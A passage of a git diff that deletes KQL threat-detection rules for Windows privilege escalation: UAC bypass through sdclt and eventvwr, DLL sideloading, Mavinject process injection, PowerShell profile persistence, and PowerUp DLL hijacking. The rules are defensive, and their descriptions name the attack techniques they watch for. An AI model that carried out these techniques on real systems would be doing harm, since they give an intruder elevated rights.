"\\faultrep.dll" or FolderPath endswith "\\fddevquery.dll" or FolderPath endswith "\\feclient.dll" or FolderPath endswith "\\fhcfg.dll" or FolderPath endswith "\\firewallapi.dll" or FolderPath endswith "\\flightsettings.dll" or FolderPath endswith "\\fltlib.dll" or FolderPath endswith "\\fveapi.dll" or FolderPath endswith "\\fwbase.dll" or FolderPath endswith "\\fwcfg.dll" or FolderPath endswith "\\fwpolicyiomgr.dll" or FolderPath endswith "\\fwpuclnt.dll" or FolderPath endswith "\\getuname.dll" or FolderPath endswith "\\hid.dll" or FolderPath endswith "\\hnetmon.dll" or FolderPath endswith "\\httpapi.dll" or FolderPath endswith "\\idstore.dll" or FolderPath endswith "\\ieadvpack.dll" or FolderPath endswith "\\iedkcs32.dll" or FolderPath endswith "\\iernonce.dll" or FolderPath endswith "\\iertutil.dll" or FolderPath endswith "\\ifmon.dll" or FolderPath endswith "\\iphlpapi.dll" or FolderPath endswith "\\iri.dll" or FolderPath endswith "\\iscsidsc.dll" or FolderPath endswith "\\iscsium.dll" or FolderPath endswith "\\isv.exe_rsaenh.dll" or FolderPath endswith "\\joinutil.dll" or FolderPath endswith "\\ksuser.dll" or FolderPath endswith "\\ktmw32.dll" or FolderPath endswith "\\licensemanagerapi.dll" or FolderPath endswith "\\licensingdiagspp.dll" or FolderPath endswith "\\linkinfo.dll" or FolderPath endswith "\\loadperf.dll" or FolderPath endswith "\\logoncli.dll" or FolderPath endswith "\\logoncontroller.dll" or FolderPath endswith "\\lpksetupproxyserv.dll" or FolderPath endswith "\\magnification.dll" or FolderPath endswith "\\mapistub.dll" or FolderPath endswith "\\mfcore.dll" or FolderPath endswith "\\mfplat.dll" or FolderPath endswith "\\mi.dll" or FolderPath endswith "\\midimap.dll" or FolderPath endswith "\\miutils.dll" or FolderPath endswith "\\mlang.dll" or FolderPath endswith "\\mmdevapi.dll" or FolderPath endswith "\\mobilenetworking.dll" or FolderPath endswith "\\mpr.dll" or FolderPath endswith "\\mprapi.dll" or FolderPath endswith "\\mrmcorer.dll" or FolderPath endswith "\\msacm32.dll" or FolderPath endswith "\\mscms.dll" or FolderPath endswith "\\mscoree.dll" or FolderPath endswith "\\msctf.dll" or FolderPath endswith "\\msctfmonitor.dll" or FolderPath endswith "\\msdrm.dll" or FolderPath endswith "\\msftedit.dll" or FolderPath endswith "\\msi.dll" or FolderPath endswith "\\msutb.dll" or FolderPath endswith "\\mswb7.dll" or FolderPath endswith "\\mswsock.dll" or FolderPath endswith "\\msxml3.dll" or FolderPath endswith "\\mtxclu.dll" or FolderPath endswith "\\napinsp.dll" or FolderPath endswith "\\ncrypt.dll" or FolderPath endswith "\\ndfapi.dll" or FolderPath endswith "\\netid.dll" or FolderPath endswith "\\netiohlp.dll" or FolderPath endswith "\\netplwiz.dll" or FolderPath endswith "\\netprofm.dll" or FolderPath endswith "\\netsetupapi.dll" or FolderPath endswith "\\netshell.dll" or FolderPath endswith "\\netutils.dll" or FolderPath endswith "\\networkexplorer.dll" or FolderPath endswith "\\newdev.dll" or FolderPath endswith "\\ninput.dll" or FolderPath endswith "\\nlaapi.dll" or FolderPath endswith "\\nlansp_c.dll" or FolderPath endswith "\\npmproxy.dll" or FolderPath endswith "\\nshhttp.dll" or FolderPath endswith "\\nshipsec.dll" or FolderPath endswith "\\nshwfp.dll" or FolderPath endswith "\\ntdsapi.dll" or FolderPath endswith "\\ntlanman.dll" or FolderPath endswith "\\ntlmshared.dll" or FolderPath endswith "\\ntmarta.dll" or FolderPath endswith "\\ntshrui.dll" or FolderPath endswith "\\oleacc.dll" or FolderPath endswith "\\omadmapi.dll" or FolderPath endswith "\\onex.dll" or FolderPath endswith "\\osbaseln.dll" or FolderPath endswith "\\osuninst.dll" or FolderPath endswith "\\p2p.dll" or FolderPath endswith "\\p2pnetsh.dll" or FolderPath endswith "\\p9np.dll" or FolderPath endswith "\\pcaui.dll" or FolderPath endswith "\\pdh.dll" or FolderPath endswith "\\peerdistsh.dll" or FolderPath endswith "\\pla.dll" or FolderPath endswith "\\pnrpnsp.dll" or FolderPath endswith "\\policymanager.dll" or FolderPath endswith "\\polstore.dll" or FolderPath endswith "\\printui.dll" or FolderPath endswith "\\propsys.dll" or FolderPath endswith "\\prvdmofcomp.dll" or FolderPath endswith "\\puiapi.dll" or FolderPath endswith "\\radcui.dll" or FolderPath endswith "\\rasapi32.dll" or FolderPath endswith "\\rasgcw.dll" or FolderPath endswith "\\rasman.dll" or FolderPath endswith "\\rasmontr.dll" or FolderPath endswith "\\reagent.dll" or FolderPath endswith "\\regapi.dll" or FolderPath endswith "\\resutils.dll" or FolderPath endswith "\\rmclient.dll" or FolderPath endswith "\\rpcnsh.dll" or FolderPath endswith "\\rsaenh.dll" or FolderPath endswith "\\rtutils.dll" or FolderPath endswith "\\rtworkq.dll" or FolderPath endswith "\\samcli.dll" or FolderPath endswith "\\samlib.dll" or FolderPath endswith "\\sapi_onecore.dll" or FolderPath endswith "\\sas.dll" or FolderPath endswith "\\scansetting.dll" or FolderPath endswith "\\scecli.dll" or FolderPath endswith "\\schedcli.dll" or FolderPath endswith "\\secur32.dll" or FolderPath endswith "\\shell32.dll" or FolderPath endswith "\\slc.dll" or FolderPath endswith "\\snmpapi.dll" or FolderPath endswith "\\spp.dll" or FolderPath endswith "\\sppc.dll" or FolderPath endswith "\\srclient.dll" or FolderPath endswith "\\srpapi.dll" or FolderPath endswith "\\srvcli.dll" or FolderPath endswith "\\ssp.exe_rsaenh.dll" or FolderPath endswith "\\ssp_isv.exe_rsaenh.dll" or FolderPath endswith "\\sspicli.dll" or FolderPath endswith "\\ssshim.dll" or FolderPath endswith "\\staterepository.core.dll" or FolderPath endswith "\\structuredquery.dll" or FolderPath endswith "\\sxshared.dll" or FolderPath endswith "\\tapi32.dll" or FolderPath endswith "\\tbs.dll" or FolderPath endswith "\\tdh.dll" or FolderPath endswith "\\tquery.dll" or FolderPath endswith "\\tsworkspace.dll" or FolderPath endswith "\\ttdrecord.dll" or FolderPath endswith "\\twext.dll" or FolderPath endswith "\\twinapi.dll" or FolderPath endswith "\\twinui.appcore.dll" or FolderPath endswith "\\uianimation.dll" or FolderPath endswith "\\uiautomationcore.dll" or FolderPath endswith "\\uireng.dll" or FolderPath endswith "\\uiribbon.dll" or FolderPath endswith "\\updatepolicy.dll" or FolderPath endswith "\\userenv.dll" or FolderPath endswith "\\utildll.dll" or FolderPath endswith "\\uxinit.dll" or FolderPath endswith "\\uxtheme.dll" or FolderPath endswith "\\vaultcli.dll" or FolderPath endswith "\\virtdisk.dll" or FolderPath endswith "\\vssapi.dll" or FolderPath endswith "\\vsstrace.dll" or FolderPath endswith "\\wbemprox.dll" or FolderPath endswith "\\wbemsvc.dll" or FolderPath endswith "\\wcmapi.dll" or FolderPath endswith "\\wcnnetsh.dll" or FolderPath endswith "\\wdi.dll" or FolderPath endswith "\\wdscore.dll" or FolderPath endswith "\\webservices.dll" or FolderPath endswith "\\wecapi.dll" or FolderPath endswith "\\wer.dll" or FolderPath endswith "\\wevtapi.dll" or FolderPath endswith "\\whhelper.dll" or FolderPath endswith "\\wimgapi.dll" or FolderPath endswith "\\winbrand.dll" or FolderPath endswith "\\windows.storage.dll" or FolderPath endswith "\\windows.storage.search.dll" or FolderPath endswith "\\windowscodecs.dll" or FolderPath endswith "\\windowscodecsext.dll" or FolderPath endswith "\\windowsudk.shellcommon.dll" or FolderPath endswith "\\winhttp.dll" or FolderPath endswith "\\wininet.dll" or FolderPath endswith "\\winipsec.dll" or FolderPath endswith "\\winmde.dll" or FolderPath endswith "\\winmm.dll" or FolderPath endswith "\\winnsi.dll" or FolderPath endswith "\\winrnr.dll" or FolderPath endswith "\\winsqlite3.dll" or FolderPath endswith "\\winsta.dll" or FolderPath endswith "\\wkscli.dll" or FolderPath endswith "\\wlanapi.dll" or FolderPath endswith "\\wlancfg.dll" or FolderPath endswith "\\wldp.dll" or FolderPath endswith "\\wlidprov.dll" or FolderPath endswith "\\wmiclnt.dll" or FolderPath endswith "\\wmidcom.dll" or FolderPath endswith "\\wmiutils.dll" or FolderPath endswith "\\wmsgapi.dll" or FolderPath endswith "\\wofutil.dll" or FolderPath endswith "\\wpdshext.dll" or FolderPath endswith "\\wshbth.dll" or FolderPath endswith "\\wshelper.dll" or FolderPath endswith "\\wtsapi32.dll" or FolderPath endswith "\\wwapi.dll" or FolderPath endswith "\\xmllite.dll" or FolderPath endswith "\\xolehlp.dll" or FolderPath endswith "\\xwizards.dll" or FolderPath endswith "\\xwtpw32.dll" or FolderPath endswith "\\aclui.dll" or FolderPath endswith "\\bderepair.dll" or FolderPath endswith "\\bootmenuux.dll" or FolderPath endswith "\\dcntel.dll" or FolderPath endswith "\\dwmcore.dll" or FolderPath endswith "\\dynamoapi.dll" or FolderPath endswith "\\fhsvcctl.dll" or FolderPath endswith "\\fxsst.dll" or FolderPath endswith "\\inproclogger.dll" or FolderPath endswith "\\iumbase.dll" or FolderPath endswith "\\kdstub.dll" or FolderPath endswith "\\maintenanceui.dll" or FolderPath endswith "\\mdmdiagnostics.dll" or FolderPath endswith "\\mintdh.dll" or FolderPath endswith "\\msdtctm.dll" or FolderPath endswith "\\nettrace.dll" or FolderPath endswith "\\osksupport.dll" or FolderPath endswith "\\reseteng.dll" or FolderPath endswith "\\resetengine.dll" or FolderPath endswith "\\spectrumsyncclient.dll" or FolderPath endswith "\\srcore.dll" or FolderPath endswith "\\systemsettingsthresholdadminflowui.dll" or FolderPath endswith "\\timesync.dll" or FolderPath endswith "\\upshared.dll" or FolderPath endswith "\\wmpdui.dll" or FolderPath endswith "\\wwancfg.dll" or FolderPath endswith "\\dpx.dll" or FolderPath endswith "\\fxsapi.dll" or FolderPath endswith "\\fxstiff.dll" or FolderPath endswith "\\xpsservices.dll" or FolderPath endswith "\\appvpolicy.dll" or FolderPath endswith "\\batmeter.dll" or FolderPath endswith "\\bootux.dll" or FolderPath endswith "\\cmutil.dll" or FolderPath endswith "\\configmanager2.dll" or FolderPath endswith "\\coredplus.dll" or FolderPath endswith "\\coreuicomponents.dll" or FolderPath endswith "\\cryptsp.dll" or FolderPath endswith "\\dmcommandlineutils.dll" or FolderPath endswith "\\drvstore.dll" or FolderPath endswith "\\dsprop.dll" or FolderPath endswith "\\dxcore.dll" or FolderPath endswith "\\edgeiso.dll" or FolderPath endswith "\\framedynos.dll" or FolderPath endswith "\\fveskybackup.dll" or FolderPath endswith "\\fvewiz.dll" or FolderPath endswith "\\gpapi.dll" or FolderPath endswith "\\icmp.dll" or FolderPath endswith "\\ifsutil.dll" or FolderPath endswith "\\iumsdk.dll" or FolderPath endswith "\\lockhostingframework.dll" or FolderPath endswith "\\lrwizdll.dll" or FolderPath endswith "\\mbaexmlparser.dll" or FolderPath endswith "\\mfc42u.dll" or FolderPath endswith "\\msiso.dll" or FolderPath endswith "\\msvcp110_win.dll" or FolderPath endswith "\\netapi32.dll" or FolderPath endswith "\\netjoin.dll" or FolderPath endswith "\\netprovfw.dll" or FolderPath endswith "\\opcservices.dll" or FolderPath endswith "\\pkeyhelper.dll" or FolderPath endswith "\\playsndsrv.dll" or FolderPath endswith "\\powrprof.dll" or FolderPath endswith "\\prntvpt.dll" or FolderPath endswith "\\profapi.dll" or FolderPath endswith "\\proximitycommon.dll" or FolderPath endswith "\\proximityservicepal.dll" or FolderPath endswith "\\rasdlg.dll" or FolderPath endswith "\\security.dll" or FolderPath endswith "\\sppcext.dll" or FolderPath endswith "\\srmtrace.dll" or FolderPath endswith "\\tpmcoreprovisioning.dll" or FolderPath endswith "\\umpdc.dll" or FolderPath endswith "\\unattend.dll" or FolderPath endswith "\\urlmon.dll" or FolderPath endswith "\\vdsutil.dll" or FolderPath endswith "\\version.dll" or FolderPath endswith "\\winbio.dll" or FolderPath endswith "\\windows.ui.immersive.dll" or FolderPath endswith "\\winscard.dll" or FolderPath endswith "\\winsync.dll" or FolderPath endswith "\\wscapi.dll" or FolderPath endswith "\\wsmsvc.dll" or FolderPath endswith "\\FxsCompose.dll" or FolderPath endswith "\\WfsR.dll" or FolderPath endswith "\\rpchttp.dll" or FolderPath endswith "\\storageusage.dll" or FolderPath endswith "\\amsi.dll" or FolderPath endswith "\\PrintIsolationProxy.dll" or FolderPath endswith "\\msdtcVSp1res.dll" or FolderPath endswith "\\rdpendp.dll" or FolderPath endswith "\\dxilconv.dll" or FolderPath endswith "\\utcutil.dll" or FolderPath endswith "\\appraiser.dll" or FolderPath endswith "\\dsound.dll" or FolderPath endswith "\\DispBroker.dll" or FolderPath endswith "\\FXSRESM.DLL" or FolderPath endswith "\\cryptnet.dll" or FolderPath endswith "\\COMRES.DLL" or FolderPath endswith "\\igdumdim64.dll" or FolderPath endswith "\\igd10iumd64.dll" or FolderPath endswith "\\igd12umd64.dll" or FolderPath endswith "\\igdusc64.dll" or FolderPath endswith "\\WLBSCTRL.dll" or FolderPath endswith "\\TSMSISrv.dll" or FolderPath endswith "\\TSVIPSrv.dll" or FolderPath endswith "\\wow64log.dll" or FolderPath endswith "\\WptsExtensions.dll" or FolderPath endswith "\\wbemcomn.dll") and (not(((FolderPath contains "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\" and FolderPath endswith "\\version.dll") or (FolderPath endswith "\\cscui.dll" and FolderPath startswith "C:\\Windows\\Microsoft.NET\\") or (FolderPath contains "C:\\$WINDOWS.~BT\\" or FolderPath contains "C:\\$WinREAgent\\" or FolderPath contains "C:\\Windows\\SoftwareDistribution\\" or FolderPath contains "C:\\Windows\\System32\\" or FolderPath contains "C:\\Windows\\SystemTemp\\" or FolderPath contains "C:\\Windows\\SysWOW64\\" or FolderPath contains "C:\\Windows\\WinSxS\\")))) and (not(((FolderPath contains "C:\\Program Files\\Arsenal-Image-Mounter-" and (FolderPath endswith "\\mi.dll" or FolderPath endswith "\\miutils.dl")) or FolderPath contains "C:\\Packages\\Plugins\\Microsoft.GuestConfiguration.ConfigurationforWindows\\" or ((FolderPath contains "C:\\Program Files\\CheckPoint\\" or FolderPath contains "C:\\Program Files (x86)\\CheckPoint\\") and FolderPath endswith "\\PolicyManager.dll" and (InitiatingProcessFolderPath contains "C:\\Program Files\\CheckPoint\\" or InitiatingProcessFolderPath contains "C:\\Program Files (x86)\\CheckPoint\\") and InitiatingProcessFolderPath endswith "\\SmartConsole.exe") or (FolderPath contains ":\\Program Files\\WindowsApps\\DellInc.DellSupportAssistforPCs" and (InitiatingProcessFolderPath contains "C:\\Program Files\\WindowsApps\\DellInc.DellSupportAssistforPCs" or InitiatingProcessFolderPath contains "C:\\Windows\\System32\\backgroundTaskHost.exe")) or (InitiatingProcessFolderPath contains "C:\\Program Files\\WindowsApps\\DellInc.DellSupportAssistforPCs" and InitiatingProcessFolderPath endswith "\\wldp.dll") or (FolderPath contains "C:\\Program Files\\Microsoft\\Exchange Server\\" and FolderPath endswith "\\mswb7.dll") or (FolderPath endswith "C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVPolicy.dll" and InitiatingProcessFolderPath endswith "C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeClickToRun.exe"))))
\ No newline at end of file
diff --git a/Privilege Escalation/Potential_UAC_Bypass_Via_Sdclt.EXE.kql b/Privilege Escalation/Potential_UAC_Bypass_Via_Sdclt.EXE.kql
deleted file mode 100644
index cb5229ea..00000000
--- a/Privilege Escalation/Potential_UAC_Bypass_Via_Sdclt.EXE.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
-// Date: 2020/05/02
-// Level: medium
-// Description: A General detection for sdclt being spawned as an elevated process. This could be an indicator of sdclt being used for bypass UAC techniques.
-// Tags: attack.privilege_escalation, attack.defense_evasion, attack.t1548.002
-DeviceProcessEvents
-| where FolderPath endswith "sdclt.exe" and ProcessIntegrityLevel =~ "High"
\ No newline at end of file
diff --git a/Privilege Escalation/Potential_Vivaldi_elf.DLL_Sideloading.kql b/Privilege Escalation/Potential_Vivaldi_elf.DLL_Sideloading.kql
deleted file mode 100644
index da809f2c..00000000
--- a/Privilege Escalation/Potential_Vivaldi_elf.DLL_Sideloading.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/08/03
-// Level: medium
-// Description: Detects potential DLL sideloading of "vivaldi_elf.dll"
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\vivaldi_elf.dll" and (not((FolderPath contains "\\Vivaldi\\Application\\" and InitiatingProcessFolderPath endswith "\\Vivaldi\\Application\\vivaldi.exe")))
\ No newline at end of file
diff --git a/Privilege Escalation/Potential_WWlib.DLL_Sideloading.kql b/Privilege Escalation/Potential_WWlib.DLL_Sideloading.kql
deleted file mode 100644
index 4753e096..00000000
--- a/Privilege Escalation/Potential_WWlib.DLL_Sideloading.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/05/18
-// Level: medium
-// Description: Detects potential DLL sideloading of "wwlib.dll"
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\wwlib.dll" and (not(((FolderPath startswith "C:\\Program Files (x86)\\Microsoft Office\\" or FolderPath startswith "C:\\Program Files\\Microsoft Office\\") and InitiatingProcessFolderPath endswith "\\winword.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft Office\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft Office\\"))))
\ No newline at end of file
diff --git a/Privilege Escalation/Potential_Waveedit.DLL_Sideloading.kql b/Privilege Escalation/Potential_Waveedit.DLL_Sideloading.kql
deleted file mode 100644
index 77fc4544..00000000
--- a/Privilege Escalation/Potential_Waveedit.DLL_Sideloading.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/06/14
-// Level: high
-// Description: Detects potential DLL sideloading of "waveedit.dll", which is part of the Nero WaveEditor audio editing software.
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\waveedit.dll" and (not(((InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Nero\\Nero Apps\\Nero WaveEditor\\waveedit.exe", "C:\\Program Files\\Nero\\Nero Apps\\Nero WaveEditor\\waveedit.exe")) and (FolderPath startswith "C:\\Program Files (x86)\\Nero\\Nero Apps\\Nero WaveEditor\\" or FolderPath startswith "C:\\Program Files\\Nero\\Nero Apps\\Nero WaveEditor\\"))))
\ No newline at end of file
diff --git a/Privilege Escalation/Potential_Wazuh_Security_Platform_DLL_Sideloading.kql b/Privilege Escalation/Potential_Wazuh_Security_Platform_DLL_Sideloading.kql
deleted file mode 100644
index 224f54fb..00000000
--- a/Privilege Escalation/Potential_Wazuh_Security_Platform_DLL_Sideloading.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/03/13
-// Level: medium
-// Description: Detects potential DLL side loading of DLLs that are part of the Wazuh security platform
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where (FolderPath endswith "\\libwazuhshared.dll" or FolderPath endswith "\\libwinpthread-1.dll") and (not((FolderPath startswith "C:\\Program Files\\" or FolderPath startswith "C:\\Program Files (x86)\\"))) and (not(((FolderPath contains "\\AppData\\Local\\" or FolderPath contains "\\ProgramData\\") and FolderPath endswith "\\mingw64\\bin\\libwinpthread-1.dll")))
\ No newline at end of file
diff --git a/Privilege Escalation/Potential_appverifUI.DLL_Sideloading.kql b/Privilege Escalation/Potential_appverifUI.DLL_Sideloading.kql
deleted file mode 100644
index fa40db7c..00000000
--- a/Privilege Escalation/Potential_appverifUI.DLL_Sideloading.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/06/20
-// Level: high
-// Description: Detects potential DLL sideloading of "appverifUI.dll"
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\appverifUI.dll" and (not(((InitiatingProcessFolderPath in~ ("C:\\Windows\\SysWOW64\\appverif.exe", "C:\\Windows\\System32\\appverif.exe")) and (FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C:\\Windows\\WinSxS\\"))))
\ No newline at end of file
diff --git a/Privilege Escalation/Potentially_Suspicious_Child_Process_of_KeyScrambler.exe.kql b/Privilege Escalation/Potentially_Suspicious_Child_Process_of_KeyScrambler.exe.kql
deleted file mode 100644
index a30d1353..00000000
--- a/Privilege Escalation/Potentially_Suspicious_Child_Process_of_KeyScrambler.exe.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Swachchhanda Shrawan Poudel
-// Date: 2024/05/13
-// Level: medium
-// Description: Detects potentially suspicious child processes of KeyScrambler.exe
-// Tags: attack.execution, attack.defense_evasion, attack.privilege_escalation, attack.t1203, attack.t1574.002
-DeviceProcessEvents
-| where ((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wscript.exe") or (ProcessVersionInfoOriginalFileName in~ ("Cmd.Exe", "cscript.exe", "mshta.exe", "PowerShell.EXE", "pwsh.dll", "regsvr32.exe", "RUNDLL32.EXE", "wscript.exe"))) and InitiatingProcessFolderPath endswith "\\KeyScrambler.exe"
\ No newline at end of file
diff --git a/Privilege Escalation/Potentially_Suspicious_Event_Viewer_Child_Process.kql b/Privilege Escalation/Potentially_Suspicious_Event_Viewer_Child_Process.kql
deleted file mode 100644
index 0897182f..00000000
--- a/Privilege Escalation/Potentially_Suspicious_Event_Viewer_Child_Process.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2017/03/19
-// Level: high
-// Description: Detects uncommon or suspicious child processes of "eventvwr.exe" which might indicate a UAC bypass attempt
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002, car.2019-04-001
-DeviceProcessEvents
-| where InitiatingProcessFolderPath endswith "\\eventvwr.exe" and (not((FolderPath endswith ":\\Windows\\System32\\mmc.exe" or FolderPath endswith ":\\Windows\\System32\\WerFault.exe" or FolderPath endswith ":\\Windows\\SysWOW64\\WerFault.exe")))
\ No newline at end of file
diff --git a/Privilege Escalation/PowerShell_Profile_Modification.kql b/Privilege Escalation/PowerShell_Profile_Modification.kql
deleted file mode 100644
index cfccee4d..00000000
--- a/Privilege Escalation/PowerShell_Profile_Modification.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: HieuTT35, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2019/10/24
-// Level: medium
-// Description: Detects the creation or modification of a powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence
-// Tags: attack.persistence, attack.privilege_escalation, attack.t1546.013
-DeviceFileEvents
-| where FolderPath endswith "\\Microsoft.PowerShell_profile.ps1" or FolderPath endswith "\\PowerShell\\profile.ps1" or FolderPath endswith "\\Program Files\\PowerShell\\7-preview\\profile.ps1" or FolderPath endswith "\\Program Files\\PowerShell\\7\\profile.ps1" or FolderPath endswith "\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1" or FolderPath endswith "\\WindowsPowerShell\\profile.ps1"
\ No newline at end of file
diff --git a/Privilege Escalation/Powerup_Write_Hijack_DLL.kql b/Privilege Escalation/Powerup_Write_Hijack_DLL.kql
deleted file mode 100644
index b2cd19b0..00000000
--- a/Privilege Escalation/Powerup_Write_Hijack_DLL.kql	
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: Subhash Popuri (@pbssubhash)
-// Date: 2021/08/21
-// Level: high
-// Description: Powerup tool's Write Hijack DLL exploits DLL hijacking for privilege escalation.
-In it's default mode, it builds a self deleting .bat file which executes malicious command.
-The detection rule relies on creation of the malicious bat file (debug.bat by default).
-
-// Tags: attack.persistence, attack.privilege_escalation, attack.defense_evasion, attack.t1574.001
-DeviceFileEvents
-| where (InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe") and FolderPath endswith ".bat"
\ No newline at end of file
diff --git a/Privilege Escalation/Process_Creation_Using_Sysnative_Folder.kql b/Privilege Escalation/Process_Creation_Using_Sysnative_Folder.kql
deleted file mode 100644
index f767153d..00000000
--- a/Privilege Escalation/Process_Creation_Using_Sysnative_Folder.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Max Altgelt (Nextron Systems)
-// Date: 2022/08/23
-// Level: medium
-// Description: Detects process creation events that use the Sysnative folder (common for CobaltStrike spawns)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1055
-DeviceProcessEvents
-| where ProcessCommandLine contains ":\\Windows\\Sysnative\\" or FolderPath contains ":\\Windows\\Sysnative\\"
\ No newline at end of file
diff --git a/Privilege Escalation/Process_Explorer_Driver_Creation_By_Non-Sysinternals_Binary.kql b/Privilege Escalation/Process_Explorer_Driver_Creation_By_Non-Sysinternals_Binary.kql
deleted file mode 100644
index db3f32f1..00000000
--- a/Privilege Escalation/Process_Explorer_Driver_Creation_By_Non-Sysinternals_Binary.kql	
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2023/05/05
-// Level: high
-// Description: Detects creation of the Process Explorer drivers by processes other than Process Explorer (procexp) itself.
-Hack tools or malware may use the Process Explorer driver to elevate privileges, drops it to disk for a few moments, runs a service using that driver and removes it afterwards.
-
-// Tags: attack.persistence, attack.privilege_escalation, attack.t1068
-DeviceFileEvents
-| where (FolderPath contains "\\PROCEXP" and FolderPath endswith ".sys") and (not((InitiatingProcessFolderPath endswith "\\procexp.exe" or InitiatingProcessFolderPath endswith "\\procexp64.exe")))
\ No newline at end of file
diff --git a/Privilege Escalation/Process_Monitor_Driver_Creation_By_Non-Sysinternals_Binary.kql b/Privilege Escalation/Process_Monitor_Driver_Creation_By_Non-Sysinternals_Binary.kql
deleted file mode 100644
index c6201772..00000000
--- a/Privilege Escalation/Process_Monitor_Driver_Creation_By_Non-Sysinternals_Binary.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/05/05
-// Level: medium
-// Description: Detects creation of the Process Monitor driver by processes other than Process Monitor (procmon) itself.
-// Tags: attack.persistence, attack.privilege_escalation, attack.t1068
-DeviceFileEvents
-| where (FolderPath contains "\\procmon" and FolderPath endswith ".sys") and (not((InitiatingProcessFolderPath endswith "\\procmon.exe" or InitiatingProcessFolderPath endswith "\\procmon64.exe")))
\ No newline at end of file
diff --git a/Privilege Escalation/Regedit_as_Trusted_Installer.kql b/Privilege Escalation/Regedit_as_Trusted_Installer.kql
deleted file mode 100644
index a45472ea..00000000
--- a/Privilege Escalation/Regedit_as_Trusted_Installer.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021/05/27
-// Level: high
-// Description: Detects a regedit started with TrustedInstaller privileges or by ProcessHacker.exe
-// Tags: attack.privilege_escalation, attack.t1548
-DeviceProcessEvents
-| where FolderPath endswith "\\regedit.exe" and (InitiatingProcessFolderPath endswith "\\TrustedInstaller.exe" or InitiatingProcessFolderPath endswith "\\ProcessHacker.exe")
\ No newline at end of file
diff --git a/Privilege Escalation/Renamed_Mavinject.EXE_Execution.kql b/Privilege Escalation/Renamed_Mavinject.EXE_Execution.kql
deleted file mode 100644
index e67eb044..00000000
--- a/Privilege Escalation/Renamed_Mavinject.EXE_Execution.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113, Florian Roth
-// Date: 2022/12/05
-// Level: high
-// Description: Detects the execution of a renamed version of the "Mavinject" process. Which can be abused to perform process injection using the "/INJECTRUNNING" flag
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1055.001, attack.t1218.013
-DeviceProcessEvents
-| where (ProcessVersionInfoOriginalFileName in~ ("mavinject32.exe", "mavinject64.exe")) and (not((FolderPath endswith "\\mavinject32.exe" or FolderPath endswith "\\mavinject64.exe")))
\ No newline at end of file
diff --git a/Privilege Escalation/Rundll32_Registered_COM_Objects.kql b/Privilege Escalation/Rundll32_Registered_COM_Objects.kql
deleted file mode 100644
index 314c9c8a..00000000
--- a/Privilege Escalation/Rundll32_Registered_COM_Objects.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/02/13
-// Level: high
-// Description: load malicious registered COM objects
-// Tags: attack.privilege_escalation, attack.persistence, attack.t1546.015
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "-sta " or ProcessCommandLine contains "-localserver ") and (ProcessCommandLine contains "{" and ProcessCommandLine contains "}")) and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE")
\ No newline at end of file
diff --git a/Privilege Escalation/Scheduled_Task_Creation_Via_Schtasks.EXE.kql b/Privilege Escalation/Scheduled_Task_Creation_Via_Schtasks.EXE.kql
deleted file mode 100644
index 0ea2e752..00000000
--- a/Privilege Escalation/Scheduled_Task_Creation_Via_Schtasks.EXE.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
